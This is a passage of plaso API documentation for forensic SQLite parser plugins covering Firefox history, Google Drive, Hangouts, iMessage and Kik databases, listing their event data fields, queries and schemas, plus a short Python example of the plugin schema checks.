DEFAULT 0, expiration INTEGER DEFAULT 0, type INTEGER DEFAULT 0, dateAdded INTEGER DEFAULT 0, lastModified INTEGER DEFAULT 0)', 'moz_keywords': 'CREATE TABLE moz_keywords ( id INTEGER PRIMARY KEY AUTOINCREMENT, keyword TEXT UNIQUE)', 'moz_places': 'CREATE TABLE moz_places ( id INTEGER PRIMARY KEY, url LONGVARCHAR, 
title LONGVARCHAR, rev_host LONGVARCHAR, visit_count INTEGER DEFAULT 0, hidden INTEGER DEFAULT 0 NOT NULL, typed INTEGER DEFAULT 0 NOT NULL, favicon_id INTEGER, frecency INTEGER DEFAULT -1 NOT NULL, last_visit_date INTEGER , guid TEXT)', 'sqlite_stat1': 'CREATE TABLE sqlite_stat1(tbl, idx, stat)'}]


URL_CACHE_QUERY = 'SELECT h.id AS id, p.url, p.rev_host FROM moz_places p, moz_historyvisits h WHERE p.id = h.place_id'

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkAnnotationEventData
Bases: plaso.containers.events.EventData
Firefox bookmark annotation event data.

content
    annotation content.
    Type: str
offset
    identifier of the row from which the event data was extracted.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
title
    title of the bookmark folder.
    Type: str
url
    bookmarked URL.
    Type: str
DATA_TYPE = 'firefox:places:bookmark_annotation'

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkEventData
Bases: plaso.containers.events.EventData
Firefox bookmark event data.

host
    visited hostname.
    Type: str
offset
    identifier of the row from which the event data was extracted.
    Type: str
places_title
    places title.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
title
    title of the bookmark folder.
    Type: str


type
    bookmark type.
    Type: int
url
    bookmarked URL.
    Type: str
visit_count
    visit count.
    Type: int
DATA_TYPE = 'firefox:places:bookmark'

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesBookmarkFolderEventData
Bases: plaso.containers.events.EventData
Firefox bookmark folder event data.

offset
    identifier of the row from which the event data was extracted.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
title
    title of the bookmark folder.
    Type: str
DATA_TYPE = 'firefox:places:bookmark_folder'

class plaso.parsers.sqlite_plugins.firefox_history.FirefoxPlacesPageVisitedEventData
Bases: plaso.containers.events.EventData
Firefox page visited event data.

from_visit
    URL that referred to the visited page.
    Type: str
hidden
    value that indicates whether the URL was hidden.
    Type: str
host
    visited hostname.
    Type: str
offset
    identifier of the row from which the event data was extracted.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
title
    title of the visited page.
    Type: str
typed
    value that indicates whether the URL was typed.
    Type: str
url
    URL of the visited page.
    Type: str
visit_count
    visit count.
    Type: int
visit_type
    transition type for the event.
    Type: str
DATA_TYPE = 'firefox:places:page_visited'

plaso.parsers.sqlite_plugins.gdrive module

SQLite parser plugin for Google Drive snapshot database files.

class plaso.parsers.sqlite_plugins.gdrive.GoogleDrivePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Google Drive snapshot database files.
The Google Drive snapshot database file is typically stored in: snapshot.db

CLOUD_PATH_CACHE_QUERY = 'SELECT cloud_entry.filename, cloud_entry.resource_id, cloud_relations.parent_resource_id AS parent FROM cloud_entry, cloud_relations WHERE cloud_entry.doc_type = 0 AND cloud_entry.resource_id = cloud_relations.child_resource_id'
DATA_FORMAT = 'Google Drive snapshot SQLite database (snapshot.db) file'
GetCloudPath(resource_id, cache, database)
    Return cloud path given a resource id.
    Parameters
        • resource_id (str) – resource identifier for the file.
        • cache (SQLiteCache) – cache.
        • database (SQLiteDatabase) – database.
    Returns: full path to the resource value.
    Return type: str
GetLocalPath(inode, cache, database)
    Return local path for a given inode.
    Parameters
        • inode (int) – inode number for the file.
        • cache (SQLiteCache) – cache.
        • database (SQLiteDatabase) – database.
    Returns: full path, including the filename, of the given inode value.
    Return type: str
LOCAL_PATH_CACHE_QUERY = 'SELECT local_relations.child_inode_number, local_relations.parent_inode_number, local_entry.filename FROM local_relations, local_entry WHERE local_relations.child_inode_number = local_entry.inode_number'
NAME = 'google_drive'
ParseCloudEntryRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
    Parses a cloud entry row.
    Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
        • cache (SQLiteCache) – cache.
        • database (SQLiteDatabase) – database.
ParseLocalEntryRow(parser_mediator, query, row, cache=None, database=None, **unused_kwargs)
    Parses a local entry row.
    Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
        • cache (Optional[SQLiteCache]) – cache.
        • database (Optional[SQLiteDatabase]) – database.
QUERIES = [('SELECT cloud_entry.resource_id, cloud_entry.filename, cloud_entry.modified, cloud_entry.created, cloud_entry.size, cloud_entry.doc_type, cloud_entry.shared, cloud_entry.checksum, cloud_entry.url, cloud_relations.parent_resource_id FROM cloud_entry, cloud_relations WHERE cloud_relations.child_resource_id = cloud_entry.resource_id AND cloud_entry.modified IS NOT NULL;', 'ParseCloudEntryRow'), ('SELECT inode_number, filename, modified, checksum, size FROM local_entry WHERE modified IS NOT NULL;', 'ParseLocalEntryRow')]
REQUIRED_STRUCTURE = {'cloud_entry': frozenset({'checksum', 'created', 'doc_type', 'filename', 'modified', 'resource_id', 'shared', 'size', 'url'}), 'cloud_relations': frozenset({'child_resource_id', 'parent_resource_id'}), 'local_entry': frozenset({'checksum', 'filename', 'inode_number', 'modified', 'size'}), 'local_relations': frozenset({'child_inode_number', 'parent_inode_number'})}


SCHEMAS = [{'cloud_entry': 'CREATE TABLE cloud_entry (resource_id TEXT, filename TEXT, modified INTEGER, created INTEGER, acl_role INTEGER, doc_type INTEGER, removed INTEGER, url TEXT, size INTEGER, checksum TEXT, shared INTEGER, PRIMARY KEY (resource_id))', 'cloud_relations': 'CREATE TABLE cloud_relations (child_resource_id TEXT, parent_resource_id TEXT, UNIQUE (child_resource_id, parent_resource_id), FOREIGN KEY (child_resource_id) REFERENCES cloud_entry(resource_id), FOREIGN KEY (parent_resource_id) REFERENCES cloud_entry(resource_id))', 'local_entry': 'CREATE TABLE local_entry (inode_number INTEGER, filename TEXT, modified INTEGER, checksum TEXT, size INTEGER, PRIMARY KEY (inode_number))', 'local_relations': 'CREATE TABLE local_relations (child_inode_number INTEGER, parent_inode_number INTEGER, UNIQUE (child_inode_number), FOREIGN KEY (parent_inode_number) REFERENCES local_entry(inode_number), FOREIGN KEY (child_inode_number) REFERENCES local_entry(inode_number))', 'mapping': 'CREATE TABLE mapping (inode_number INTEGER, resource_id TEXT, UNIQUE (inode_number), FOREIGN KEY (inode_number) REFERENCES local_entry(inode_number), FOREIGN KEY (resource_id) REFERENCES cloud_entry(resource_id))', 'overlay_status': 'CREATE TABLE overlay_status (path TEXT, overlay_status INTEGER, PRIMARY KEY (path))'}]

class plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotCloudEntryEventData
Bases: plaso.containers.events.EventData
Google Drive snapshot cloud entry event data.

doc_type
    document type.
    Type: int
path
    path of the file.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
shared
    True if the file is shared, False if the file is private.
    Type: bool
size
    size of the file.
    Type: int
url
    URL of the file.
    Type: str
DATA_TYPE = 'gdrive:snapshot:cloud_entry'

class plaso.parsers.sqlite_plugins.gdrive.GoogleDriveSnapshotLocalEntryEventData
Bases: plaso.containers.events.EventData
Google Drive snapshot local entry event data.

path
    path of the file.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
size
    size of the file.
    Type: int
DATA_TYPE = 'gdrive:snapshot:local_entry'

plaso.parsers.sqlite_plugins.hangouts_messages module

SQLite parser plugin for Google Hangouts conversations database files.

class plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessageData
Bases: plaso.containers.events.EventData
Google Hangouts message event data.

body
    content of the SMS text message.
    Type: str
message_status
    message status.
    Type: int
message_type
    message type.
    Type: int
offset
    identifier of the row from which the event data was extracted.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
sender
    name of the sender.
    Type: str
DATA_TYPE = 'android:messaging:hangouts'

class plaso.parsers.sqlite_plugins.hangouts_messages.HangoutsMessagePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for Google Hangouts conversations database files.
The Google Hangouts conversations database file is typically stored in: /data/com.google.android.talk/databases/babel.db
This SQLite database is the conversation database for conversations, participant names, messages, and information about the Google Hangout event. There can be multiple babel.db databases, and each database name will be followed by an integer starting with 0, for example: "babel0.db, babel1.db, babel3.db".

DATA_FORMAT = 'Google Hangouts conversations SQLite database (babel.db) file'
NAME = 'hangouts_messages'
ParseMessagesRow(parser_mediator, query, row, **unused_kwargs)
    Parses a messages row.
    Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
QUERIES = [('SELECT messages._id, participants.full_name, text, messages.timestamp,status, type FROM messages INNER JOIN participants ON messages.author_chat_id=participants.chat_id;', 'ParseMessagesRow')]
REQUIRED_STRUCTURE = {'blocked_people': frozenset({}), 'messages': frozenset({'_id', 'author_chat_id', 'status', 'text', 'timestamp', 'type'}), 'participants': frozenset({'chat_id', 'full_name'})}


SCHEMAS = [{'android_metadata': 'CREATE TABLE android_metadata (locale TEXT)', 'blocked_people': 'CREATE TABLE blocked_people (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, profile_photo_url TEXT, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'conversation_participants': 'CREATE TABLE conversation_participants (_id INTEGER PRIMARY KEY, participant_row_id INT, participant_type INT, conversation_id TEXT, sequence INT, active INT, invitation_status INT DEFAULT(0), UNIQUE (conversation_id,participant_row_id) ON CONFLICT REPLACE, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, FOREIGN KEY (participant_row_id) REFERENCES participants(_id))', 'conversations': 'CREATE TABLE conversations (_id INTEGER PRIMARY KEY, conversation_id TEXT, conversation_type INT, latest_message_timestamp INT DEFAULT(0), latest_message_expiration_timestamp INT, metadata_present INT,notification_level INT, name TEXT, generated_name TEXT, snippet_type INT, snippet_text TEXT, snippet_image_url TEXT, snippet_author_gaia_id TEXT, snippet_author_chat_id TEXT, snippet_message_row_id INT, snippet_selector INT, snippet_status INT, snippet_new_conversation_name TEXT, snippet_participant_keys TEXT, snippet_sms_type TEXT, previous_latest_timestamp INT, status INT, view INT, inviter_gaia_id TEXT, inviter_chat_id TEXT, inviter_affinity INT, is_pending_leave INT, account_id INT, is_otr INT, packed_avatar_urls TEXT, self_avatar_url TEXT, self_watermark INT DEFAULT(0), chat_watermark INT DEFAULT(0), hangout_watermark INT DEFAULT(0), is_draft INT, sequence_number INT, call_media_type INT DEFAULT(0), has_joined_hangout INT, has_chat_notifications DEFAULT(0),has_video_notifications DEFAULT(0),last_hangout_event_time INT, draft TEXT, otr_status INT, otr_toggle INT, last_otr_modification_time INT, continuation_token BLOB, continuation_event_timestamp INT, has_oldest_message INT DEFAULT(0), sort_timestamp INT, 
first_peak_scroll_time INT, first_peak_scroll_to_message_timestamp INT, second_peak_scroll_time INT, second_peak_scroll_to_message_timestamp INT, conversation_hash BLOB, disposition INT DEFAULT(0), has_persistent_events INT DEFAULT(-1), transport_type INT DEFAULT(1), default_transport_phone TEXT, sms_service_center TEXT, is_temporary INT DEFAULT (0), sms_thread_id INT DEFAULT (-1), chat_ringtone_uri TEXT, hangout_ringtone_uri TEXT, snippet_voicemail_duration INT DEFAULT (0), share_count INT DEFAULT(0), has_unobserved TEXT, last_share_timestamp INT DEFAULT(0), gls_status INT DEFAULT(0), gls_link TEXT, is_guest INT DEFAULT(0), UNIQUE (conversation_id ))', 'dismissed_contacts': 'CREATE TABLE dismissed_contacts (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, profile_photo_url TEXT, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'event_suggestions': 'CREATE TABLE event_suggestions (_id INTEGER PRIMARY KEY, conversation_id TEXT, event_id TEXT, suggestion_id TEXT, timestamp INT, expiration_time_usec INT, type INT, gem_asset_url STRING, gem_horizontal_alignment INT, matched_message_substring TEXT, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (conversation_id,suggestion_id) ON CONFLICT REPLACE)', 'merge_keys': 'CREATE TABLE merge_keys (_id INTEGER PRIMARY KEY, conversation_id TEXT, merge_key TEXT, UNIQUE (conversation_id) ON CONFLICT REPLACE, FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE )', 'merged_contact_details': 'CREATE TABLE merged_contact_details (_id INTEGER PRIMARY KEY, merged_contact_id INT, lookup_data_type INT, lookup_data TEXT, lookup_data_standardized TEXT, lookup_data_search TEXT, lookup_data_label TEXT, needs_gaia_ids_resolved INT DEFAULT (1), is_hangouts_user INT DEFAULT (0), gaia_id TEXT, avatar_url TEXT, display_name TEXT, last_checked_ts INT DEFAULT (0), lookup_data_display 
TEXT, detail_affinity_score REAL DEFAULT (0.0), detail_logging_id TEXT, is_in_viewer_dasher_domain INT DEFAULT (0), FOREIGN KEY (merged_contact_id) REFERENCES merged_contacts(_id) ON DELETE CASCADE ON UPDATE CASCADE)', 'merged_contacts': 'CREATE TABLE merged_contacts (_id INTEGER PRIMARY KEY, contact_lookup_key TEXT, contact_id INT, raw_contact_id INT, display_name TEXT, avatar_url TEXT, is_frequent INT DEFAULT (0), is_favorite INT DEFAULT (0), contact_source INT DEFAULT(0), frequent_order INT, person_logging_id TEXT, person_affinity_score REAL DEFAULT (0.0), is_in_same_domain INT DEFAULT (0))', 'messages': 'CREATE TABLE messages (_id INTEGER PRIMARY KEY, message_id TEXT, message_type INT, conversation_id TEXT, author_chat_id TEXT, author_gaia_id TEXT, text TEXT, timestamp INT, delete_after_read_timetamp INT, status INT, type INT, local_url TEXT, remote_url TEXT, attachment_content_type TEXT, width_pixels INT, height_pixels INT, stream_id TEXT, image_id TEXT, album_id TEXT, latitude DOUBLE, longitude DOUBLE, address ADDRESS, notification_level INT, expiration_timestamp INT, notified_for_failure INT DEFAULT(0), off_the_record INT DEFAULT(0), transport_type INT NOT NULL DEFAULT(1), transport_phone TEXT, external_ids TEXT, sms_timestamp_sent INT DEFAULT(0), sms_priority INT DEFAULT(0), sms_message_size INT DEFAULT(0), mms_subject TEXT, sms_raw_sender TEXT, sms_raw_recipients TEXT, persisted INT DEFAULT(1), sms_message_status INT DEFAULT(-1), sms_type INT DEFAULT(-1), stream_url TEXT, attachment_target_url TEXT, attachment_name TEXT, image_rotation INT DEFAULT (0), new_conversation_name TEXT, participant_keys TEXT, forwarded_mms_url TEXT, forwarded_mms_count INT DEFAULT(0), attachment_description TEXT, attachment_target_url_description TEXT, attachment_target_url_name TEXT, attachment_blob_data BLOB,attachment_uploading_progress INT DEFAULT(0), sending_error INT DEFAULT(0), stream_expiration INT, voicemail_length INT DEFAULT (0), 
call_media_type INT DEFAULT(0), last_seen_timestamp INT DEFAULT(0), observed_status INT DEFAULT(2), receive_type INT DEFAULT(0), init_timestamp INT DEFAULT(0), in_app_msg_latency INT DEFAULT(0), notified INT DEFAULT(0), alert_in_conversation_list INT DEFAULT(0), attachments BLOB, is_user_mentioned INT DEFAULT(0), local_id TEXT, request_task_row_id INT DEFAULT(-1), FOREIGN KEY (conversation_id) REFERENCES conversations(conversation_id) ON DELETE CASCADE ON UPDATE CASCADE, UNIQUE (conversation_id,message_id) ON CONFLICT REPLACE)', 'mms_notification_inds': 'CREATE TABLE mms_notification_inds (_id INTEGER PRIMARY KEY, content_location TEXT, transaction_id TEXT, from_address TEXT, message_size INT DEFAULT(0), expiry INT)', 'multipart_attachments': 'CREATE TABLE multipart_attachments (_id INTEGER PRIMARY KEY, message_id TEXT, conversation_id TEXT, url TEXT, content_type TEXT, width INT, height INT, FOREIGN KEY (message_id, conversation_id) REFERENCES messages(message_id, conversation_id) ON DELETE CASCADE ON UPDATE CASCADE)', 'participant_email_fts': 'CREATE VIRTUAL TABLE participant_email_fts USING fts4(content="merged_contact_details", gaia_id,lookup_data)', 'participant_email_fts_docsize': "CREATE TABLE 'participant_email_fts_docsize'(docid INTEGER PRIMARY KEY, size BLOB)", 'participant_email_fts_segdir': "CREATE TABLE 'participant_email_fts_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx))", 'participant_email_fts_segments': "CREATE TABLE 'participant_email_fts_segments'(blockid INTEGER PRIMARY KEY, block BLOB)", 'participant_email_fts_stat': "CREATE TABLE 'participant_email_fts_stat'(id INTEGER PRIMARY KEY, value BLOB)", 'participants': "CREATE TABLE participants (_id INTEGER PRIMARY KEY, participant_type INT DEFAULT 1, gaia_id TEXT, chat_id TEXT, phone_id TEXT, circle_id TEXT, first_name TEXT, full_name TEXT, fallback_name TEXT, profile_photo_url TEXT, batch_gebi_tag STRING 
DEFAULT('-1'), blocked INT DEFAULT(0), in_users_domain BOOLEAN, UNIQUE (circle_id) ON CONFLICT REPLACE, UNIQUE (chat_id) ON CONFLICT REPLACE, UNIQUE (gaia_id) ON CONFLICT REPLACE)", 'participants_fts': 'CREATE VIRTUAL TABLE participants_fts USING fts4(content="participants",gaia_id,full_name)', 'participants_fts_docsize': "CREATE TABLE 'participants_fts_docsize'(docid INTEGER PRIMARY KEY, size BLOB)", 'participants_fts_segdir': "CREATE TABLE 'participants_fts_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx))", 'participants_fts_segments': "CREATE TABLE 'participants_fts_segments'(blockid INTEGER PRIMARY KEY, block BLOB)", 'participants_fts_stat': "CREATE TABLE 'participants_fts_stat'(id INTEGER PRIMARY KEY, value BLOB)", 'presence': 'CREATE TABLE presence (_id INTEGER PRIMARY KEY, gaia_id TEXT NOT NULL, reachable INT DEFAULT(0), reachable_time INT DEFAULT(0), available INT DEFAULT(0), available_time INT DEFAULT(0), status_message TEXT, status_message_time INT DEFAULT(0), call_type INT DEFAULT(0), call_type_time INT DEFAULT(0), device_status INT DEFAULT(0), device_status_time INT DEFAULT(0), last_seen INT DEFAULT(0), last_seen_time INT DEFAULT(0), location BLOB, location_time INT DEFAULT(0), UNIQUE (gaia_id) ON CONFLICT REPLACE)', 'recent_calls': 'CREATE TABLE recent_calls (_id INTEGER PRIMARY KEY, normalized_number TEXT NOT NULL, phone_number TEXT, contact_id TEXT, call_timestamp INT, call_type INT, contact_type INT, call_rate TEXT, is_free_call BOOLEAN)', 'search': 'CREATE TABLE search (search_key TEXT NOT NULL,continuation_token TEXT,PRIMARY KEY (search_key))', 'sticker_albums': 'CREATE TABLE sticker_albums (album_id TEXT NOT NULL, title TEXT, cover_photo_id TEXT, last_used INT DEFAULT(0), PRIMARY KEY (album_id))', 'sticker_photos': 'CREATE TABLE sticker_photos (photo_id TEXT NOT NULL, album_id TEXT NOT NULL, url TEXT NOT NULL, file_name TEXT, last_used INT DEFAULT(0), PRIMARY KEY 
(photo_id), FOREIGN KEY (album_id) REFERENCES sticker_albums(album_id) ON DELETE CASCADE)', 'suggested_contacts': 'CREATE TABLE suggested_contacts (_id INTEGER PRIMARY KEY, gaia_id TEXT, chat_id TEXT, name TEXT, first_name TEXT, packed_circle_ids TEXT, profile_photo_url TEXT, sequence INT, suggestion_type INT, logging_id TEXT, affinity_score REAL DEFAULT (0.0), is_in_same_domain INT DEFAULT (0))'}]

plaso.parsers.sqlite_plugins.imessage module

SQLite parser plugin for MacOS and iOS iMessage database files.

class plaso.parsers.sqlite_plugins.imessage.IMessageEventData
Bases: plaso.containers.events.EventData
iMessage and SMS event data.

attachment_location
    location of the attachment.
    Type: str
imessage_id
    mobile number or email address the message was sent to or received from.
    Type: str
message_type
    value to indicate the message was sent (1) or received (0).
    Type: int
offset
    identifier of the row from which the event data was extracted.
    Type: str
query
    SQL query that was used to obtain the event data.
    Type: str
read_receipt
    True if the message read receipt was received.
    Type: bool
service
    service, which is either SMS or iMessage.
    Type: str
text
    content of the message.
    Type: str
DATA_TYPE = 'imessage:event:chat'

class plaso.parsers.sqlite_plugins.imessage.IMessagePlugin
Bases: plaso.parsers.sqlite_plugins.interface.SQLitePlugin
SQLite parser plugin for MacOS and iOS iMessage database files.
The iMessage database file is typically stored in:
    chat.db
    sms.db

DATA_FORMAT = 'MacOS and iOS iMessage database (chat.db, sms.db) file'
NAME = 'imessage'
ParseMessageRow(parser_mediator, query, row, **unused_kwargs)
    Parses a message row.
    Parameters
        • parser_mediator (ParserMediator) – mediates interactions between parsers and other components, such as storage and dfvfs.
        • query (str) – query that created the row.
        • row (sqlite3.Row) – row.
QUERIES = [('SELECT m.date, m.ROWID, h.id AS imessage_id, m.is_read AS read_receipt, m.is_from_me AS message_type, m.service, a.filename AS"attachment_location", m.text FROM message AS m JOIN handle AS h ON h.ROWID = m.handle_id LEFT OUTER JOIN message_attachment_join AS maj ON m.ROWID = maj.message_id LEFT OUTER JOIN attachment AS a ON maj.attachment_id = a.ROWID', 'ParseMessageRow')]
REQUIRED_STRUCTURE = {'attachment': frozenset({'ROWID', 'filename'}), 'handle': frozenset({'ROWID', 'id'}), 'message': frozenset({'ROWID', 'date', 'handle_id', 'is_from_me', 'is_read', 'service', 'text'}), 'message_attachment_join': frozenset({'attachment_id', 'message_id'})}


SCHEMAS = [{'_SqliteDatabaseProperties': 'CREATE TABLE _SqliteDatabaseProperties (key TEXT, value TEXT, UNIQUE(key))', 'attachment': 'CREATE TABLE attachment (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, created_date INTEGER DEFAULT 0, start_date INTEGER DEFAULT 0, filename TEXT, uti TEXT, mime_type TEXT, transfer_state INTEGER DEFAULT 0, is_outgoing INTEGER DEFAULT 0, user_info BLOB, transfer_name TEXT, total_bytes INTEGER DEFAULT 0)', 'chat': 'CREATE TABLE chat (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, style INTEGER, state INTEGER, account_id TEXT, properties BLOB, chat_identifier TEXT, service_name TEXT, room_name TEXT, account_login TEXT, is_archived INTEGER DEFAULT 0, last_addressed_handle TEXT, display_name TEXT, group_id TEXT, is_filtered INTEGER, successful_query INTEGER)', 'chat_handle_join': 'CREATE TABLE chat_handle_join (chat_id INTEGER REFERENCES chat (ROWID) ON DELETE CASCADE, handle_id INTEGER REFERENCES handle (ROWID) ON DELETE CASCADE, UNIQUE(chat_id, handle_id))', 'chat_message_join': 'CREATE TABLE chat_message_join (chat_id INTEGER REFERENCES chat (ROWID) ON DELETE CASCADE, message_id INTEGER REFERENCES message (ROWID) ON DELETE CASCADE, PRIMARY KEY (chat_id, message_id))', 'deleted_messages': 'CREATE TABLE deleted_messages (ROWID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, guid TEXT NOT NULL)', 'handle': 'CREATE TABLE handle (ROWID INTEGER PRIMARY KEY AUTOINCREMENT UNIQUE, id TEXT NOT NULL, country TEXT, service TEXT NOT NULL, uncanonicalized_id TEXT, UNIQUE (id, service) )', 'message': 'CREATE TABLE message (ROWID INTEGER PRIMARY KEY AUTOINCREMENT, guid TEXT UNIQUE NOT NULL, text TEXT, replace INTEGER DEFAULT 0, service_center TEXT, handle_id INTEGER DEFAULT 0, subject TEXT, country TEXT, attributedBody BLOB, version INTEGER DEFAULT 0, type INTEGER DEFAULT 0, service TEXT, account TEXT, account_guid TEXT, error INTEGER DEFAULT 0, date INTEGER, date_read INTEGER, date_delivered INTEGER, 
is_delivered INTEGER DEFAULT 0, is_finished INTEGER DEFAULT 0, is_emote INTEGER DEFAULT 0, is_from_me INTEGER DEFAULT 0, is_empty INTEGER DEFAULT 0, is_delayed INTEGER DEFAULT 0, is_auto_reply INTEGER DEFAULT 0, is_prepared INTEGER DEFAULT 0, is_read INTEGER DEFAULT 0, is_system_message INTEGER DEFAULT 0, is_sent INTEGER DEFAULT 0, has_dd_results INTEGER DEFAULT 0, is_service_message INTEGER DEFAULT 0, is_forward INTEGER DEFAULT 0, was_downgraded INTEGER DEFAULT 0, is_archive INTEGER DEFAULT 0, cache_has_attachments INTEGER DEFAULT 0, cache_roomnames TEXT, was_data_detected INTEGER DEFAULT 0, was_deduplicated INTEGER DEFAULT 0, is_audio_message INTEGER DEFAULT 0, is_played INTEGER DEFAULT 0, date_played INTEGER, item_type INTEGER DEFAULT 0, other_handle INTEGER DEFAULT 0, group_title TEXT, group_action_type INTEGER DEFAULT 0, share_status INTEGER DEFAULT 0, share_direction INTEGER DEFAULT 0, is_expirable INTEGER DEFAULT 0, expire_state INTEGER DEFAULT 0, message_action_type INTEGER DEFAULT 0, message_source INTEGER DEFAULT 0)', 'message_attachment_join': 'CREATE TABLE message_attachment_join (message_id INTEGER REFERENCES message (ROWID) ON DELETE CASCADE, attachment_id INTEGER REFERENCES attachment (ROWID) ON DELETE CASCADE, UNIQUE(message_id, attachment_id))'}]

plaso.parsers.sqlite_plugins.interface module

Interface for SQLite database file parser plugins.

class plaso.parsers.sqlite_plugins.interface.SQLitePlugin
Bases: plaso.parsers.plugins.BasePlugin
SQLite parser plugin.

CheckRequiredTablesAndColumns(database)
    Check if the database has the minimal structure required by the plugin.
    Parameters: database (SQLiteDatabase) – the database whose structure is being checked.
    Returns: True if the database has the required tables and columns defined by the plugin, or False if it does not or if the plugin does not define required tables and columns. The database can have more tables and/or columns than specified by the plugin and still return True.
    Return type: bool
CheckSchema(database)
    Checks the schema of a database against that defined in the plugin.
    Parameters: database (SQLiteDatabase) – SQLite database to check.
    Returns: True if the schema of the database matches that defined by the plugin, or False if the schemas do not match or no schema is defined by the plugin.
    Return type: bool
DATA_FORMAT = 'SQLite database file'
NAME = 'sqlite_plugin'
Process(parser_mediator, cache=None, database=None, **unused_kwargs)
    Extracts events from a SQLite database.
    Parameters
        • parser_mediator (ParserMediator) – parser mediator.
        • cache (Optional[SQLiteCache]) – cache.
        • database (Optional[SQLiteDatabase]) – database.
    Raises: ValueError – if the database or cache value is missing.
QUERIES = []
REQUIRED_STRUCTURE = {}
REQUIRES_SCHEMA_MATCH = False
SCHEMAS = []
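The two checks described for SQLitePlugin above, re-created as added example code that is not plaso's implementation: it follows only the documented semantics, uses the standard sqlite3 module, and takes the Kodi `files` table definition from this page as the known schema against a constructed in-memory database.

```python
"""Stand-alone re-creation of the structure checks documented for
SQLitePlugin. Added example code, not plaso's implementation: it follows only
the documented semantics and uses sqlite3 with a constructed database."""
import sqlite3

# Attribute values copied from the KodiMyVideosPlugin documentation.
KODI_REQUIRED_STRUCTURE = {
    'files': frozenset({'idFile', 'lastPlayed', 'playCount', 'strFilename'})}
KODI_SCHEMA = {
    'files': ('CREATE TABLE files ( idFile integer primary key, idPath integer, '
              'strFilename text, playCount integer, lastPlayed text, '
              'dateAdded text)')}


def make_constructed_database(create_statements):
  """Builds an in-memory SQLite database from CREATE TABLE statements.

  The statements are constructed test input standing in for a database
  recovered from an image.
  """
  connection = sqlite3.connect(':memory:')
  for statement in create_statements:
    connection.execute(statement)
  return connection


def get_schema(connection):
  """Returns {table name: CREATE statement} as recorded in sqlite_master."""
  rows = connection.execute(
      "SELECT name, sql FROM sqlite_master WHERE type = 'table'").fetchall()
  return {name: sql for name, sql in rows}


def get_table_columns(connection):
  """Returns {table name: set of column names} for every table."""
  tables = {}
  for name in get_schema(connection):
    # PRAGMA arguments cannot be bound as parameters; the name comes from
    # sqlite_master and doubled quotes keep unusual table names safe.
    quoted_name = name.replace('"', '""')
    rows = connection.execute(
        'PRAGMA table_info("{0:s}")'.format(quoted_name)).fetchall()
    tables[name] = {row[1] for row in rows}
  return tables


def check_required_tables_and_columns(connection, required_structure):
  """Documented semantics of CheckRequiredTablesAndColumns.

  True only if every required table exists and holds every required column.
  Extra tables or columns do not matter, and a plugin that defines no
  required structure gets False.
  """
  if not required_structure:
    return False
  tables = get_table_columns(connection)
  for table_name, required_columns in required_structure.items():
    if table_name not in tables:
      return False
    if not required_columns.issubset(tables[table_name]):
      return False
  return True


def check_schema(connection, schemas):
  """Documented semantics of CheckSchema.

  True only if the database's CREATE statements match one of the plugin's
  known schemas exactly (same tables, same statement text), False if none
  match or the plugin defines no schema. sqlite_master keeps the statement
  text as written after the table name, so a string comparison suffices.
  """
  if not schemas:
    return False
  database_schema = get_schema(connection)
  return any(database_schema == schema for schema in schemas)


if __name__ == '__main__':
  # A database with exactly the documented table passes both checks. Adding
  # an unrelated table still satisfies the required-structure check but no
  # longer matches the schema, which is the distinction between the methods.
  exact = make_constructed_database(list(KODI_SCHEMA.values()))
  extended = make_constructed_database(
      list(KODI_SCHEMA.values()) + ['CREATE TABLE settings (name TEXT)'])
  print(check_required_tables_and_columns(exact, KODI_REQUIRED_STRUCTURE),
        check_schema(exact, [KODI_SCHEMA]))
  print(check_required_tables_and_columns(extended, KODI_REQUIRED_STRUCTURE),
        check_schema(extended, [KODI_SCHEMA]))
```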

plaso.parsers.sqlite_plugins.kik_ios module

SQLite parser plugin for iOS Kik messenger database files.

class plaso.parsers.sqlite_plugins.kik_ios.KikIOSMessageEventData
Bases: plaso.containers.events.EventData
Kik message event data.

body
    content of the message.
    Type: str
message_status
